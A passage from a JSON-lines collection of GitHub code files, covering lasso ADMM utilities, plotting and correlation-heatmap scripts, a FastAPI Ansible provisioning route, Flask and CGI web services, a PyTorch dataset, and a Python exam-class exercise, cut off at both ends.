self.number):\n #In this case, the model can take the amount of characters\n #indicated by self.number as context\n character = text[charIndex]\n #logging.info( \"MODEL #\"+str(self.number))\n currContext = text[charIndex] if (self.number == 0) else text[charIndex-self.number:charIndex]\n #logging.info( \"compressing (\" +str(currContext)+ \")\" + str(character))\n #logging.info( \"available contexts:\" +str(self.contexts.keys()))\n\n if (currContext in self.contexts):\n return self.contexts[currContext].compress(character, previousContexts, interval)\n elif (currContext != \"\"):\n #This context does not exist in this model, so we add it.\n self.__add(Context(currContext,character))\n #logging.info( \"Added context:\" + currContext + \" to model \"+str(self.number))\n\n #This context could not compress this text because\n #it does not contain the desired context.\n return (False, interval)\n","repo_name":"emariotti3/VowpalWabbit","sub_path":"PPMC/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22245825760","text":"import pdb, time\nimport numpy as np\nimport scipy.sparse as sparse\nfrom scipy.sparse.linalg import spsolve\nfrom numpy.linalg import norm, cholesky\n\ndef BIC(y_true, y_pred, n_features):\n\t\"\"\"Calculate the Bayesian Information Criterion under the assumption of \n\tnormally distributed disturbances (which allows the BIC to take on the\n\tsimple form below).\n\t\n\tParameters\n\t----------\n\tReturns\n\t-------\n\tBIC : float\n\t\tBayesian Information Criterion\n\t\"\"\"\n\tn_samples = y_true.size\n\trss = np.sum((y_true - y_pred)**2)\n\tBIC = n_samples * np.log(rss/n_samples) + n_features * np.log(n_samples)\n\treturn BIC\n\ndef AIC(y_true, y_pred, n_features):\n\tn_samples = y_true.size\n\trss = np.sum((y_true - y_pred)**2)\n\tAIC = n_samples * np.log(rss/n_samples) + n_features * 2\n\treturn AIC\n\ndef AICc(y_true, y_pred, n_features):\n\tn_samples = y_true.size\n\trss = np.sum((y_true - y_pred)**2)\n\tAICc = n_samples * np.log(rss/n_samples) + n_features * 2 \\\n\t\t+ 2 * (n_features**2 + n_features)/(n_samples - n_features - 1)\n\treturn AICc\n\ndef leveled_randomized_ids(groups, fraction):\n\t\"\"\"Grab bootstrap indices that are leveled across groups.\n\n\tParameters\n\t----------\n\tgroups : array of size (n_samples)\n\t\tcontains indices identifying each sample to a specific group\n\n\tfraction : float\n\t\tfraction of samples to be selected\n\n\tReturns\n\t-------\n\tleveled_ids : array of size (n_selected_samples)\n\t\tcontains the leveled indices that are selected into the bootstrap\n\n\tleftover_ids : array\n\t\tcontains the leftover indices (useful for splitting into train/test sets)\n\n\t\"\"\"\n\t# initialize id arrays\n\tleveled_ids = np.array([])\n\tleftover_ids = np.array([])\n\t# extract unique group ids\n\tunique_ids = np.unique(groups)\n\t# iterate through the unique group ids\n\tfor group_id in unique_ids:\n\t\t# extract the sample indices in the current group\n\t\tcandidate_idx = np.argwhere(groups == group_id).ravel()\n\t\t# number of samples that'll be selected from this group into bootstrap\n\t\tn_ids_group = int(fraction * candidate_idx.size)\n\t\t# permute the ids\n\t\tpermuted = np.random.permutation(candidate_idx)\n\t\t# split up the ids into the selected and leftover arrays\n\t\tselected_ids_group, leftover_ids_group = np.split(permuted, [n_ids_group])\n\t\t# toss the selected/leftover ids in their corresponding group\n\t\tleveled_ids = np.append(leveled_ids, selected_ids_group)\n\t\tleftover_ids = np.append(leftover_ids, leftover_ids_group)\n\treturn leveled_ids.astype('int'), leftover_ids.astype('int')\n\ndef lasso_admm(X, y, lamb, rho=1., alpha=1., \n\t\t\tmax_iter=1000, abs_tol=1e-5, rel_tol=1e-3,\n\t\t\tverbose=False):\n\t\"\"\"Solve the Lasso optimization problem using Alternating Direction Method of Multipliers (ADMM)\n\t\n\tConvergence criteria are given in section 3.3.1 in the Boyd manuscript (equation 3.12).\n\t\"\"\"\n\tn_samples, n_features = X.shape\n\n\t# initialize parameter estimates x/z and dual estimates u (equivalent to y)\n\tx = np.zeros((n_features, 1))\n\tz = np.zeros((n_features, 1))\n\t# dual; equivalent to y in most formulations\n\tu = np.zeros((n_features, 1))\n\n\tXy = np.dot(X.T, y).reshape((n_features, 1))\n\tinv = np.linalg.inv(np.dot(X.T, X) + rho * np.identity(n_features))\n\n\tfor iteration in range(max_iter):\n\t\t# update x estimates\n\t\tx = np.dot(inv, Xy + rho * (z - u))\n\n\t\t# handle the over-relaxation term\n\t\tz_old = np.copy(z)\n\t\tx_hat = alpha * x + (1 - alpha) * z_old\n\t\t\n\t\t# update z term with over-relaxation\n\t\tz = shrinkage(x=x_hat, threshold=lamb/rho)\n\n\t\t# update dual\n\t\tu += x_hat - z\n\n\t\t# check convergence using eqn 3.12\n\t\tr_norm = norm(x - z)\n\t\ts_norm = norm(rho * (z - z_old))\n\n\t\teps_primal = np.sqrt(n_features) * abs_tol + np.maximum(norm(x), norm(z)) * rel_tol\n\t\teps_dual = np.sqrt(n_features) * abs_tol + norm(u) * rel_tol\n\n\t\tif (r_norm <= eps_primal) and (s_norm <= eps_dual):\n\t\t\tif verbose: print('Convergence: iteration %s' %iteration)\n\t\t\tbreak\n\treturn z.ravel()\n\ndef lasso_admm_old(X, y, alpha, rho=1., rel_par=1., max_iter=50, ABSTOL=1e-3, RELTOL=1e-2):\n\t\"\"\"\n\t Solve lasso problem via ADMM\n\t\n\t [z, history] = lasso_admm(X,y,alpha,rho,rel_par)\n\t\n\t Solves the following problem via ADMM:\n\t\n\t\t minimize 1/2*|| Ax - y ||_2^2 + alpha || x ||_1\n\t\n\t The solution is returned in the vector z.\n\t\n\t history is a dictionary containing the objective value, the primal and\n\t dual residual norms, and the tolerances for the primal and dual residual\n\t norms at each iteration.\n\t\n\t rho is the augmented Lagrangian parameter.\n\t\n\t rel_par is the over-relaxation parameter (typical values for rel_par are\n\t between 1.0 and 1.8).\n\t\n\t More information can be found in the paper linked at:\n\t http://www.stanford.edu/~boyd/papers/distr_opt_stat_learning_admm.html\n\t\"\"\"\n\t# Data preprocessing\n\tn_samples, n_features = X.shape\n\t# save a matrix-vector multiply\n\tXy = np.dot(X.T, y).reshape((n_features, 1))\n\n\t# ADMM solver\n\tx = np.zeros((n_features, 1))\n\tz = np.zeros((n_features, 1))\n\tu = np.zeros((n_features, 1))\n\n\t# cache the (Cholesky) factorization\n\tL, U = factor(X, rho)\n\n\tfor k in range(max_iter):\n\t\t# x-update \n\t\tq = Xy + rho * (z - u) # (temporary value)\n\t\tif n_samples >= n_features:\n\t\t\tx = spsolve(U, spsolve(L, q)).reshape((n_features, 1))\n\t\telse:\n\t\t\tULXq = spsolve(U, spsolve(L, X.dot(q)))\n\t\t\tx = (q * 1. / rho) - ((np.dot(X.T, ULXq)) * 1. / (rho ** 2))\n\t\t# z-update with relaxation\n\t\tzold = np.copy(z)\n\t\tx_hat = rel_par * x + (1. - rel_par) * zold\n\t\tz = shrinkage(x_hat + u, alpha * 1. / rho)\n\t\t# u-update\n\t\tu += (x_hat - z)\n\n\t\t# diagnostics, reporting, termination checks\n\t\t#objval = objective(X, y, alpha, x, z)\n\t\tr_norm = norm(x - z)\n\t\ts_norm = norm(-rho * (z - zold))\n\t\teps_pri = np.sqrt(n_features) * ABSTOL + RELTOL * np.maximum(norm(x), norm(-z))\n\t\teps_dual = np.sqrt(n_features) * ABSTOL + RELTOL * norm(rho * u)\n\n\t\tif (r_norm < eps_pri) and (s_norm < eps_dual):\n\t\t\tbreak\n\n\treturn z.ravel()\n\ndef shrinkage(x, threshold):\n\treturn np.maximum(0., x - threshold) - np.maximum(0., -x - threshold)\n\ndef factor(X, rho):\n\tn_samples, n_features = X.shape\n\tif n_samples >= n_features:\n\t\t\tL = cholesky(np.dot(X.T, X) + rho * sparse.eye(n_features))\n\telse:\n\t\t\tL = cholesky(sparse.eye(n_samples) + 1. / rho * (np.dot(X, X.T)))\n\tL = sparse.csc_matrix(L)\n\tU = sparse.csc_matrix(L.T)\n\treturn L, U\n","repo_name":"pssachdeva/uoi-neuro","sub_path":"retina_strf/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41849997070","text":"\nimport pylab as plt\nimport numpy as np\nimport pandas as pd\n\nxvalues = np.arange(0.0, 20.0, 0.1)\n\ndf = pd.DataFrame({\n 'x': xvalues,\n 'sin': np.sin(xvalues),\n 'cos': np.cos(xvalues),\n 'tan': np.tan(xvalues),\n 'log': np.log(xvalues),\n})\n\nfig = plt.figure()\n\nax1 = fig.add_subplot(2, 2, 1)\nax1.plot(df['x'], df['sin'], 'k--')\nplt.xlabel('x')\nplt.ylabel('$sin(x)$')\nplt.axis([0.0, 20.0, -1.2, 1.2])\n\nax2 = fig.add_subplot(2, 2, 2)\nax2.plot(df['x'], df['cos'], 'r^')\nplt.xlabel('x')\nplt.ylabel('$cos(x)$')\nplt.axis([0.0, 20.0, -1.2, 1.2])\n\nax3 = fig.add_subplot(2, 2, 3)\nax3.plot(df['x'], df['tan'], 'g-')\nplt.xlabel('x')\nplt.ylabel('$tan(x)$')\nplt.axis([0.0, 20.0, 0.0, 30.0])\n\nax4 = fig.add_subplot(2, 2, 4)\nax4.plot(df['x'], df['log'], 'bo')\nplt.xlabel('x')\nplt.ylabel('$log(x)$')\nplt.axis([0.0, 20.0, -5, 5.0])\n\nplt.subplots_adjust(wspace=0.4, hspace=0.4)\nplt.savefig('multipanel.png')\nplt.savefig('multipanel.svg')\n","repo_name":"krother/python3_grundlagenkurs","sub_path":"datenanalyse/datenvisualisierung/multipanel.py","file_name":"multipanel.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"76"} +{"seq_id":"30550563232","text":"\"\"\"Routes for handling device/base_config-related requests.\"\"\"\n\nfrom fastapi import APIRouter\nfrom fastapi.responses import JSONResponse\nfrom pydantic import BaseModel, HttpUrl\n\nfrom lso import playbook\nfrom lso.playbook import get_playbook_path\n\nrouter = APIRouter()\n\n\nclass NodeProvisioningParams(BaseModel):\n \"\"\"Parameters for node provisioning.\n\n :param callback:\n :type callback: pydantic.HttpUrl\n :param subscription:\n :type subscription: :class:`DeviceParams`\n :param dry_run:\n :type dry_run: bool, optional\n \"\"\"\n\n #: Callback URL that is reported back to WFO, this will allow for the workflow to continue once the playbook has\n #: been executed.\n callback: HttpUrl\n #: Parameters for the new device.\n subscription: dict\n #: Whether this playbook execution should be a dry run, or run for real. Defaults to ``True`` for obvious reasons,\n #: also making it an optional parameter.\n dry_run: bool | None = True\n #: Trouble Ticket number that is associated with the deployment.\n tt_number: str\n #: The process ID generated by workflow orchestrator, used for the commit comment in the routers.\n process_id: str\n\n\n@router.post(\"/\")\nasync def provision_node(params: NodeProvisioningParams) -> JSONResponse:\n \"\"\"Launch a playbook to provision a new node. The response will contain either a job id or error information.\n\n :param params: Parameters for provisioning a new node\n :type params: :class:`NodeProvisioningParams`\n :return: Response from the Ansible runner, including a run ID.\n :rtype: :class:`lso.playbook.PlaybookLaunchResponse`\n \"\"\"\n extra_vars = {\n \"wfo_router_json\": params.subscription,\n \"dry_run\": str(params.dry_run),\n \"verb\": \"deploy\",\n \"commit_comment\": f\"GSO_PROCESS_ID: {params.process_id} - TT_NUMBER: {params.tt_number} - Deploy base config\",\n }\n\n return playbook.run_playbook(\n playbook_path=get_playbook_path(\"base_config.yaml\"),\n inventory=f\"{params.subscription['router']['router_fqdn']}\",\n extra_vars=extra_vars,\n callback=params.callback,\n )\n","repo_name":"workfloworchestrator/lso","sub_path":"lso/routes/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72913867766","text":"\"\"\"\nThéo Gauvrit\nMars 2022\nFunction to create from a excel/csv data file the correlation matrices and correlation nodes and heat map plots\n\"\"\"\nimport pandas as pd\nimport networkx as nx\nimport numpy as np\nfrom outliers import smirnov_grubbs as grubbs\nimport scipy.stats as sc\nfrom pyvis.network import Network\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom netgraph import Graph\n\nplt.rcParams['svg.fonttype'] = 'none'\nplt.rcParams['font.size'] = 40\nplt.rcParams['axes.linewidth'] = 3\n\n\ndef heatmap(x, y, size, color, filename):\n n_colors = 256 # Use 256 colors for the diverging color palette\n palette = sns.diverging_palette(20, 220, n=n_colors)\n palette.reverse() # Create the palette\n color_min, color_max = [-1,\n 1] # Range of values that will be mapped to the palette, i.e. min and max possible correlation\n\n def value_to_color(val):\n val_position = float((val - color_min)) / (\n color_max - color_min) # position of value in the input range, relative to the length of the input range\n ind = int(val_position * (n_colors - 1)) # target index in the color palette\n return palette[ind]\n\n plot_grid = plt.GridSpec(1, 24, hspace=0.2, wspace=0.1) # Setup a 1x15 grid\n fig = plt.figure(figsize=(30, 25))\n ax = plt.subplot(plot_grid[:, :-1])\n # Mapping from column names to integer coordinates\n x_labels = [v for v in list(x.unique())]\n y_labels = [v for v in list(y.unique())]\n x_to_num = {p[1]: p[0] for p in enumerate(x_labels)}\n y_to_num = {p[1]: p[0] for p in enumerate(y_labels)}\n size_scale = 900\n ax.scatter(\n x=x.map(x_to_num), # Use mapping for x\n y=y.map(y_to_num), # Use mapping for y\n s=(size * size_scale).astype(float), # Vector of square sizes, proportional to size parameter\n c=color.apply(value_to_color),\n marker='s' # Use square as scatterplot marker\n )\n # Show column labels on the axes\n ax.set_xticks([x_to_num[v] for v in x_labels])\n ax.set_xticklabels(x_labels, rotation=45, horizontalalignment='right')\n ax.set_yticks([y_to_num[v] for v in y_labels])\n ax.set_yticklabels(y_labels)\n ax.grid(False, 'major')\n ax.grid(True, 'minor')\n ax.set_xticks([t + 0.5 for t in ax.get_xticks()], minor=True)\n ax.set_yticks([t + 0.5 for t in ax.get_yticks()], minor=True)\n ax.set_xlim([-0.5, max([v for v in x_to_num.values()]) + 0.5])\n ax.set_ylim([-0.5, max([v for v in y_to_num.values()]) + 0.5])\n ax.tick_params(which='both', width=3)\n ax.tick_params(which='major', length=10)\n ax = plt.subplot(plot_grid[:, -1]) # Use the rightmost column of the plot\n col_x = [1.5] * len(palette) # Fixed x coordinate for the bars\n bar_y = np.linspace(color_min, color_max, n_colors) # y coordinates for each of the n_colors bars\n\n bar_height = bar_y[1] - bar_y[0]\n ax.barh(\n y=bar_y,\n width=[2] * len(palette), # Make bars 5 units wide\n left=col_x, # Make bars start at 0\n height=bar_height,\n color=palette,\n linewidth=0\n )\n ax.set_xlim(1, 3) # Bars are going from 0 to 5, so lets crop the plot somewhere in the middle\n ax.grid(False) # Hide grid\n ax.set_facecolor('white') # Make background white\n ax.set_xticks([]) # Remove horizontal ticks\n ax.set_yticks(np.linspace(min(bar_y), max(bar_y), 3)) # Show vertical ticks for min, middle and max\n ax.yaxis.tick_right() # Show vertical ticks on the right\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.tick_params(which='both', width=3)\n ax.tick_params(which='major', length=10)\n fig.subplots_adjust(bottom=0.30, left=0.30, right=0.95, top=0.99)\n fig.savefig(filename)\n\n\ndef correlation_matrix(all_parameters_data, parameters_to_exclude):\n print(all_parameters_data[\"GENOTYPE\"])\n col_names1 = list(all_parameters_data.columns)\n for col in parameters_to_exclude:\n print(col)\n col_names1.remove(col)\n all_parameters_data = all_parameters_data.drop(col, axis=1)\n pvalue_matrix = pd.DataFrame(index=col_names1, columns=col_names1)\n coeff_matrix = pd.DataFrame(index=col_names1, columns=col_names1)\n duo = []\n for (column_name, column_data) in all_parameters_data.iteritems():\n for (column_name1, column_data1) in all_parameters_data.iteritems():\n if column_name1 == column_name:\n p_ = 1.\n r_ = 1\n else:\n print(column_name)\n column_data = column_data.astype(np.float)\n print(column_name1)\n column_data1 = column_data1.astype(np.float)\n # data = grubbs.test(column_data.values, alpha=0.05)\n # data1 = grubbs.test(column_data1.values, alpha=0.05)\n data = column_data.values\n data1 = column_data1.values\n col1_nan = set(np.argwhere(np.isnan(data)).flat)\n col2_nan = set(np.argwhere(np.isnan(data1)).flat)\n indices_nan = list(col1_nan) + list(col2_nan - col1_nan)\n col1 = np.delete(data, indices_nan)\n col2 = np.delete(data1, indices_nan)\n print(column_name, column_name1)\n print(sc.shapiro(col1))\n print(sc.shapiro(col2))\n print(col1)\n print(col2)\n r_, p_ = sc.pearsonr(col1, col2)\n print(sc.pearsonr(col1, col2))\n duo.append(column_name1 + \"/\" + column_name)\n if p_ > 0.05:\n p_ = 0.3\n else:\n p_ = 1.\n pvalue_matrix[column_name][column_name1] = p_\n coeff_matrix[column_name][column_name1] = r_\n return pvalue_matrix, coeff_matrix\n\n\ndef correlation_nodes_graph():\n pass\n\n\nif __name__ == '__main__':\n # parameters_data = pd.read_csv(\"ArjunDataGlobal4.csv\")\n # data_wt = parameters_data[parameters_data[\"GENOTYPE\"] == \"WT\"]\n # data_wt = data_wt.replace('', np.nan)\n # to_exclude_wt = [\"GENOTYPE\", \"RMSD\", \"Unnamed: 0\", \"CELL NUMBER\", \"CELL ID\", \"CELL ID spontaneous\", \"5th AP\",\n # 'AP halfwidth ratio (5/1)', \"AP halfwidth ratio (3/1)\", \"Alpha1\", \"Alpha2\", \"EPSP SD response\",\n # \"Peak latency from Onset\", 'Old SNR', \"EPSP response var\", \"1st AP\", \"ADP amplitude\", \"MAE\",\n # \"spont.firing\"]\n # pvalue_wt, coeff_wt = correlation_matrix(data_wt, to_exclude_wt)\n # corr = pd.melt(pvalue_wt.reset_index(), id_vars='index') # Unpivot the dataframe, to get pair of arrays for x and y\n # coeff = pd.melt(coeff_wt.reset_index(), id_vars='index')\n # corr.columns = ['x', 'y', 'value']\n # heatmap(\n # x=corr['x'],\n # y=corr['y'],\n # size=corr['value'].abs(),\n # color=coeff['value'],\n # filename=\"WTcorrelationPlotReduced.pdf\"\n # )\n parameters_data = pd.read_excel(\"2022.04.19 - Combined Data Individual Cells.xlsx\",sheet_name=\"FmKO Individual Cells\")\n data_kobms = parameters_data[parameters_data[\"GENOTYPE\"] ==\"WT-BMS\"]\n data_kobms = data_kobms.replace('', np.nan)\n to_exclude_kobms = [\"GENOTYPE\", \"Unnamed: 0\", \"CELL NUMBER\", \"CELL ID\", \"CELL ID spontaneous\"\n , \"AP halfwidth ratio (3/1)\", \"Alpha1\", \"Alpha2\",\n \"Peak latency from Onset\", \"1st AP\"]\n pvalue_kobms, coeff_kobms = correlation_matrix(data_kobms, to_exclude_kobms)\n corr = pd.melt(pvalue_kobms.reset_index(), id_vars='index') # Unpivot the dataframe, to get pair of arrays for x and y\n coeff = pd.melt(coeff_kobms.reset_index(), id_vars='index')\n corr.columns = ['x', 'y', 'value']\n heatmap(\n x=corr['x'],\n y=corr['y'],\n size=corr['value'].abs(),\n color=coeff['value'],\n filename=\"WTBMS_corrmatrix.pdf\"\n )\n","repo_name":"ToGauvrit/ElectroPhyAnalysis","sub_path":"Plotting/Correlation_plots.py","file_name":"Correlation_plots.py","file_ext":"py","file_size_in_byte":7970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10519650529","text":"from flask import Flask, render_template, jsonify\nimport periodic\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index_page():\n\n return render_template('index.html')\n\n\n@app.route(\"/periodic/\")\ndef get_word(word):\n\n periodics = periodic.get_periodics(word)\n if len(periodics) > 0:\n return jsonify({'periodics': periodics})\n else:\n return jsonify({\n 'no_periodics': {\n 'suggestions': periodic.find_twenty_similar_words(word)\n }\n })\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"ktbartolotta/periodically","sub_path":"periodic_app.py","file_name":"periodic_app.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18309495034","text":"class Solution:\n def minimumScore(self, nums: List[int], edges: List[List[int]]) -> int:\n n = len(nums)\n dic = defaultdict(list)\n for x, y in edges:\n dic[x].append(y)\n dic[y].append(x)\n\n cnt = [0 for _ in range(n)]\n in1 = [0 for _ in range(n)]\n out = [0 for _ in range(n)]\n clock = 0\n\n def cal(node, fa):\n nonlocal cnt, in1, out, clock\n clock += 1\n in1[node] = clock\n\n res = nums[node]\n for val in dic[node]:\n if val == fa:\n continue\n res ^= cal(val, node)\n\n cnt[node] = res\n out[node] = clock\n return res\n\n cal(0, -1)\n\n for i in range(len(edges)):\n if in1[edges[i][0]] < in1[edges[i][1]]:\n edges[i][0], edges[i][1] = edges[i][1], edges[i][0]\n\n res = float('inf')\n for (x, y), (x1, y1) in combinations(edges, 2):\n if in1[y] >= in1[x1] and out[x1] >= in1[y]:\n a, b, c = cnt[0] ^ cnt[x1], cnt[x], cnt[x1] ^ cnt[x]\n elif in1[y1] >= in1[x] and out[x] >= in1[y1]:\n a, b, c = cnt[0] ^ cnt[x], cnt[x1], cnt[x] ^ cnt[x1]\n else:\n a, b, c = cnt[x], cnt[x1], cnt[0] ^ cnt[x] ^ cnt[x1]\n res = min(res, max(a, b, c) - min(a, b, c))\n return res","repo_name":"jiangruofan/algorithm","sub_path":"2322. Minimum Score After Removals on a Tree.py","file_name":"2322. Minimum Score After Removals on a Tree.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41402814086","text":"import os\nimport random\nimport cv2\nimport joblib\nimport numpy as np\nfrom torch.utils.data import Dataset\nimport albumentations as album\n\n\ndef get_transforms(cfg):\n def get_object(transform):\n if hasattr(album, transform.name):\n return getattr(album, transform.name)\n else:\n return eval(transform.name)\n if cfg.transforms:\n transforms = [get_object(transform)(**transform.params) for name, transform in cfg.transforms.items()]\n return album.Compose(transforms)\n else:\n return None\n\n\ndef concat_tiles(image_list):\n image = []\n row_num = int(np.sqrt(len(image_list)))\n\n for i in range(row_num):\n v = [image_list[(row_num * i) + j] for j in range(row_num)]\n image.append(cv2.hconcat(v))\n\n return cv2.vconcat(image)\n\n\nclass CustomDataset(Dataset):\n def __init__(self, df, labels, cfg):\n self.cfg = cfg\n self.image_ids = df['image_id'].values\n self.labels = labels\n self.transforms = get_transforms(self.cfg)\n self.is_train = cfg.is_train\n self.image_path = f'../data/input/train_tile_{cfg.tile.size}x{cfg.tile.num}'\n self.tile_imp_dict = joblib.load('../pickle/tile_imp.pkl')\n\n def __len__(self):\n return len(self.image_ids)\n\n def __getitem__(self, idx):\n image_id = self.image_ids[idx]\n tiles = []\n for i in range(self.cfg.tile.num):\n tile = cv2.imread(f'{self.image_path}/{image_id}_{i}.png')\n if self.transforms:\n tile = self.transforms(image=tile)['image']\n tiles.append(tile)\n # if self.transforms:\n # random.shuffle(tiles)\n image = concat_tiles(tiles)\n image = 255 - (image * (255.0/image.max())).astype(np.uint8)\n # image = cv2.resize(image, dsize=(self.cfg.img_size.height, self.cfg.img_size.width))\n if self.transforms:\n image = self.transforms(image=image)['image']\n image = image.transpose(2, 0, 1).astype(np.float32)\n\n if self.is_train:\n label = self.labels.values[idx]\n return image, label\n else:\n return image\n","repo_name":"Naoki1101/kaggle-panda","sub_path":"src/dataset/custom_dataset.py","file_name":"custom_dataset.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30790274506","text":"#!/usr/bin/env python\n\"\"\" JSON service providing hourly Stage IV data for a given point \"\"\"\n\nimport datetime\nimport json\nimport sys\nimport cgi\n\nimport netCDF4\nimport numpy as np\nimport memcache\nfrom pyiem import iemre, datatypes\nfrom pyiem.util import utc\n\n\ndef myrounder(val, precision):\n \"\"\"round a float or give back None\"\"\"\n if val is None or np.isnan(val) or np.ma.is_masked(val):\n return None\n return round(val, precision)\n\n\ndef dowork(form):\n \"\"\"Do work!\"\"\"\n date = datetime.datetime.strptime(form.getfirst('valid'), '%Y-%m-%d')\n lat = float(form.getfirst(\"lat\"))\n lon = float(form.getfirst(\"lon\"))\n\n # We want data for the UTC date and timestamps are in the rears, so from\n # 1z through 1z\n sts = utc(date.year, date.month, date.day, 1)\n ets = sts + datetime.timedelta(hours=24)\n sidx = iemre.hourly_offset(sts)\n eidx = iemre.hourly_offset(ets)\n\n ncfn = \"/mesonet/data/stage4/%s_stage4_hourly.nc\" % (date.year, )\n nc = netCDF4.Dataset(ncfn, 'r')\n\n dist = ((nc.variables['lon'][:] - lon)**2 +\n (nc.variables['lat'][:] - lat)**2)**0.5\n (j, i) = np.unravel_index(dist.argmin(), dist.shape)\n res = {'gridi': i, 'gridj': j, 'data': []}\n\n ppt = nc.variables['p01m'][sidx:eidx, j, i]\n nc.close()\n\n for tx, pt in enumerate(ppt):\n valid = sts + datetime.timedelta(hours=tx)\n res['data'].append({\n 'end_valid': valid.strftime(\"%Y-%m-%dT%H:00:00Z\"),\n 'precip_in': myrounder(\n datatypes.distance(pt, 'MM').value('IN'), 2)\n })\n\n return json.dumps(res)\n\n\ndef main():\n \"\"\"Do Something Fun!\"\"\"\n sys.stdout.write(\"Content-type: application/json\\n\\n\")\n\n form = cgi.FieldStorage()\n lat = float(form.getfirst('lat'))\n lon = float(form.getfirst('lon'))\n valid = form.getfirst('valid')\n cb = form.getfirst('callback', None)\n\n mckey = \"/json/stage4/%.2f/%.2f/%s?callback=%s\" % (lon, lat, valid, cb)\n mc = memcache.Client(['iem-memcached:11211'], debug=0)\n res = mc.get(mckey)\n if not res:\n res = dowork(form)\n mc.set(mckey, res, 3600*12)\n\n if cb is None:\n sys.stdout.write(res)\n else:\n sys.stdout.write(\"%s(%s)\" % (cb, res))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ELjungdahl/iem","sub_path":"htdocs/json/stage4.py","file_name":"stage4.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"7952615671","text":"# 507/206 Homework 7 Part 2\nimport json\n\ncount = 0\n#### Your Part 2 solution goes here ####\njson_file = open(\"directory_dict.json\", \"r\")\njson_content = json_file.read()\nloaded_directory_dict = json.loads(json_content) #loading it into a dictionary from a json string\n\n\nfor key in loaded_directory_dict.keys():\n if loaded_directory_dict[key][\"title\"] == \"PhD student\":\n count +=1\n\n\n#### Your answer output (change the value in the variable, count)####\nprint('The number of PhD students: ', count)\n","repo_name":"Iviev/Web-crawling-scraping","sub_path":"hw7_part2.py","file_name":"hw7_part2.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"137186649","text":"# Create your classes here\nclass Student:\n \"\"\"Create objects of class Student, containing student names and addresses\"\"\"\n\n def __init__(self, first_name, last_name, address):\n self.first_name = first_name\n self.last_name = last_name\n self.address = address\n\n\nclass Question:\n \"\"\"Create Question objects containing a question and its correct answer\"\"\"\n\n def __init__(self, question, correct_answer):\n self.question = question\n self.correct_answer = correct_answer\n\n def ask_and_answer(self):\n response = input(self.question)\n if response == self.correct_answer:\n return True\n else:\n return False\n\n\nclass Exam:\n \"\"\"Create Exam objects, containing a name and a list of Question objects\"\"\"\n\n questions = []\n\n def __init__(self, name):\n self.name = name\n\n def add_question(self, Question_obj):\n \"\"\"Method to add individual question to the exam.\"\"\"\n self.questions.append(Question_obj)\n \n def administer(self):\n tally = 0\n for question in self.questions:\n if question.ask_and_answer():\n tally += 1\n \n score = 100 * (tally / len(self.questions))\n return score\n\n\nclass Quiz(Exam):\n \"\"\"subclass of exam, where score is modified for pass/fail\"\"\" \n def administer(self):\n score = super().administer()\n if score >= 60.0:\n return 1\n else:\n return 0\n\n\nclass StudentExam:\n \"\"\"object is a student exam, exam + method for administration\"\"\"\n score = 0\n\n def __init__(self, student, exam):\n self.student = student\n self.exam = exam\n \n def take_test(self):\n \"\"\"uses the administer method to run and score the exam\"\"\"\n self.score = self.exam.administer()\n\n\nclass StudentQuiz:\n \"\"\"object is a student quiz, quiz subclass of exam + method for administration\"\"\"\n score = 0\n\n def __init__(self, student, quiz):\n self.student = student\n self.quiz = quiz\n \n def take_test(self):\n \"\"\"uses the administer method to run and score the exam\"\"\"\n self.score = self.quiz.administer()\n\n\ndef example():\n \"\"\"creates a working student exam\"\"\"\n first_exam = Quiz('First Exam')\n alberta_capital = Question('What is the capital of Alberta?', 'Edmonton')\n first_exam.add_question(alberta_capital)\n python_author = Question('Who is the author of Python?', 'Guido Van Rossum')\n first_exam.add_question(python_author)\n set_q = Question('What is the method for adding an element to a set?', '.add()')\n first_exam.add_question(set_q)\n pwd_q = Question('What does pwd stand for?', 'print working directory')\n first_exam.add_question(pwd_q)\n list_q = Question('Python lists are mutable, iterable, and what?', 'ordered')\n first_exam.add_question(list_q)\n\n june = Student('June', 'Adam', '2023 Still here again')\n\n student_exam_1 = StudentQuiz(june, first_exam)\n\n student_exam_1.take_test()\n\n print(student_exam_1.score)\n\nexample()\n\n\n\n\n","repo_name":"juneadam/study-guide-week-2","sub_path":"oo.py","file_name":"oo.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"29681991961","text":"import glob, re, math, Crypto.Random, binascii, os\nfrom decimal import *\nfrom encryption_1 import *\nfrom collections import Counter\nfrom scipy.stats import binom\n\ndirectory = '/home/minh/Downloads/Corpus/#ubuntu+1/*'\npath_name_testing = '/home/minh/Desktop/ssee/10_day/next_testing_probability_training'\npath_name_training = '/home/minh/Desktop/ssee/10_day/training'\npath_name_AAA = '/home/minh/Desktop/ssee/60_day/AAA'\n\ndef 